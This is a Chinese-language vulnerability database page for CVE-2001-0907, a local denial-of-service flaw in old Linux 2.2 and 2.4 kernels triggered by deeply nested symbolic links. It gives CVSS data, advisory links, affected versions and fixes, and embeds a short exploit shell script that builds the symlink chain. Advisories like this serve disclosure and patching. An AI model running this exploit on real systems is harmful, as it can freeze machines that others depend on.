CVE-2001-0907
CVSS2.1
发布时间 :2001-10-18 00:00:00
修订时间 :2016-10-17 22:13:06
NMCOES    

[原文]Linux kernel 2.2.1 through 2.2.19, and 2.4.1 through 2.4.10, allows local users to cause a denial of service via a series of deeply nested symlinks, which causes the kernel to spend extra time when trying to access the link.


[CNNVD]Linux深符号连接服务拒绝漏洞(CNNVD-200110-116)

        Linux kernel 2.2.1版本到2.2.19版本,以及2.4.1版本到2.4.10版本存在漏洞。本地用户可以借助一系列深嵌套的符号连接导致服务拒绝,该漏洞导致内核在试图访问连接时花费额外时间。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:linux:linux_kernel:2.4.10Linux Kernel 2.4.10
cpe:/o:linux:linux_kernel:2.2.19Linux Kernel 2.2.19

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0907
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0907
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200110-116
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2001-036.0.txt
(UNKNOWN)  CALDERA  CSSA-2001-036.0
http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-035-01
(UNKNOWN)  IMMUNIX  IMNX-2001-70-035-01
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2001:079
(UNKNOWN)  MANDRAKE  MDKSA-2001:079
http://marc.info/?l=bugtraq&m=100343090106914&w=2
(UNKNOWN)  BUGTRAQ  20011018 Flaws in recent Linux kernels
http://marc.info/?l=bugtraq&m=100350685431610&w=2
(UNKNOWN)  BUGTRAQ  20011019 TSLSA-2001-0028
http://www.iss.net/security_center/static/7312.php
(UNKNOWN)  XF  linux-multiple-symlink-dos(7312)
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-082.php3
(UNKNOWN)  MANDRAKE  MDKSA-2001:082
http://www.linuxsecurity.com/advisories/other_advisory-1650.html
(UNKNOWN)  ENGARDE  ESA-20011019-02
http://www.novell.com/linux/security/advisories/2001_036_kernel_txt.html
(UNKNOWN)  SUSE  SuSE-SA:2001:036
http://www.securityfocus.com/bid/3444
(UNKNOWN)  BID  3444

- 漏洞信息

Linux深符号连接服务拒绝漏洞
低危 环境条件错误
2001-10-18 00:00:00 2005-05-13 00:00:00
本地  
        Linux kernel 2.2.1版本到2.2.19版本,以及2.4.1版本到2.4.10版本存在漏洞。本地用户可以借助一系列深嵌套的符号连接导致服务拒绝,该漏洞导致内核在试图访问连接时花费额外时间。

- 公告与补丁

        This issue has reportedly been fully fixed in version 2.4.12 of the Linux kernel. A patch that rectifies this issue in version 2.2.19 is also available.
        Vendor specific upgrades are also available.
        Linux kernel 2.2.15
        
        Linux kernel 2.2.17
        
        Linux kernel 2.2.19
        

- 漏洞信息 (21122)

Linux kernel 2.2/2.4 Deep Symbolic Link Denial of Service Vulnerability (EDBID:21122)
linux dos
2001-10-18 Verified
0 Nergal
N/A [点击下载]
source: http://www.securityfocus.com/bid/3444/info

A denial-of-service vulnerability exists in several versions of the Linux kernel.

The problem occurs when a user with local access creates a long chain of symbolically linked files. When the kernel dereferences the symbolic links, the process scheduler is blocked, effecively locking the system until the dereferencing is complete. 

#!/bin/sh
# by Nergal
mklink()
{
IND=$1
NXT=$(($IND+1))
EL=l$NXT/../
P=""
I=0
while [ $I -lt $ELNUM ] ; do
        P=$P"$EL"
        I=$(($I+1))
done
ln -s "$P"l$2 l$IND
}

#main program

if [ $# != 1 ] ; then
	echo A numerical argument is required.
	exit 0
fi


ELNUM=$1

mklink 4
mklink 3
mklink 2
mklink 1
mklink 0 /../../../../../../../etc/services
mkdir l5
mkdir l
 

  
		

- 漏洞信息

9568
Linux Kernel Deep Nested Symlink Local DoS
Local Access Required Denial of Service, Race Condition
Loss of Availability
Exploit Public

- 漏洞描述

- 时间线

2001-10-18 Unknow
2001-10-18 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Linux Deep Symbolic Link Denial of Service Vulnerability
Environment Error 3444
No Yes
2001-10-18 12:00:00 2009-07-11 09:06:00
Reported to Bugtraq by Rafal Wojtczuk <nergal@7bulls.com> on October 18, 2001.

- 受影响的程序版本

Linux kernel 2.4.10
+ S.u.S.E. Linux 7.3
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
Linux kernel 2.4.1
Linux kernel 2.4
Linux kernel 2.2.19
+ EnGarde Secure Linux 1.0.1
+ Immunix Immunix OS 7+
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
+ Trustix Secure Linux 1.5
Linux kernel 2.2.18
+ Caldera OpenLinux 2.4
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Conectiva Linux 4.2
+ Conectiva Linux 4.1
+ Conectiva Linux 4.0 es
+ Conectiva Linux 4.0
+ Conectiva Linux graficas
+ Conectiva Linux ecommerce
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ Mandriva Linux Mandrake 7.0
+ Mandriva Linux Mandrake 6.1
+ Mandriva Linux Mandrake 6.0
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ RedHat Linux 6.1 sparc
+ RedHat Linux 6.1 i386
+ RedHat Linux 6.1 alpha
+ RedHat Linux 6.0 sparc
+ RedHat Linux 6.0 alpha
+ RedHat Linux 6.0
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4 ppc
+ S.u.S.E. Linux 6.4 alpha
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3 ppc
+ S.u.S.E. Linux 6.3 alpha
+ S.u.S.E. Linux 6.3
+ S.u.S.E. Linux 6.1 alpha
+ S.u.S.E. Linux 6.1
+ S.u.S.E. Linux 6.0
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Slackware Linux 7.1
+ Slackware Linux 7.0
+ Slackware Linux 4.0
+ Wirex Immunix OS 7.0 -Beta
+ Wirex Immunix OS 7.0
+ Wirex Immunix OS 6.2
Linux kernel 2.2.17
+ Mandriva Linux Mandrake 7.2
+ S.u.S.E. Linux 7.0
+ Trustix Secure Linux 1.2
Linux kernel 2.2.16
+ RedHat Linux 7.0
+ Sun Cobalt Qube 3
+ Sun Cobalt RaQ XTR
+ Trustix Secure Linux 1.1
Linux kernel 2.2.15
+ MandrakeSoft Corporate Server 1.0.1
+ Mandriva Linux Mandrake 7.1
Linux kernel 2.2.14
+ Red Hat Linux 6.2
+ SCO eDesktop 2.4
+ SCO eServer 2.3.1
+ Sun Cobalt RaQ 4
Linux kernel 2.2.13
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux 6.3
Linux kernel 2.2.12
Linux kernel 2.2.10
+ Caldera OpenLinux 2.3
Linux kernel 2.2.9
Linux kernel 2.2.8
Linux kernel 2.2.7
Linux kernel 2.2.6
Linux kernel 2.2.5
Linux kernel 2.2.4
Linux kernel 2.2.3
Linux kernel 2.2.2
Linux kernel 2.2.1
Linux kernel 2.2
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11

- 不受影响的程序版本

Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11

- 漏洞讨论

A denial-of-service vulnerability exists in several versions of the Linux kernel.

The problem occurs when a user with local access creates a long chain of symbolically linked files. When the kernel dereferences the symbolic links, the process scheduler is blocked, effecively locking the system until the dereferencing is complete.

- 漏洞利用

The following exploit is due to Rafal Wojtczuk &lt;nergal@7bulls.com&gt;:

- 解决方案

This issue has reportedly been fully fixed in version 2.4.12 of the Linux kernel. A patch that rectifies this issue in version 2.2.19 is also available.

Vendor specific upgrades are also available.


Linux kernel 2.2.15

Linux kernel 2.2.17

Linux kernel 2.2.19

Linux kernel 2.4

Linux kernel 2.4.1

Linux kernel 2.4.10

Linux kernel 2.4.2

Linux kernel 2.4.3

Linux kernel 2.4.4

Linux kernel 2.4.5

Linux kernel 2.4.6

Linux kernel 2.4.7

Linux kernel 2.4.8

Linux kernel 2.4.9

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站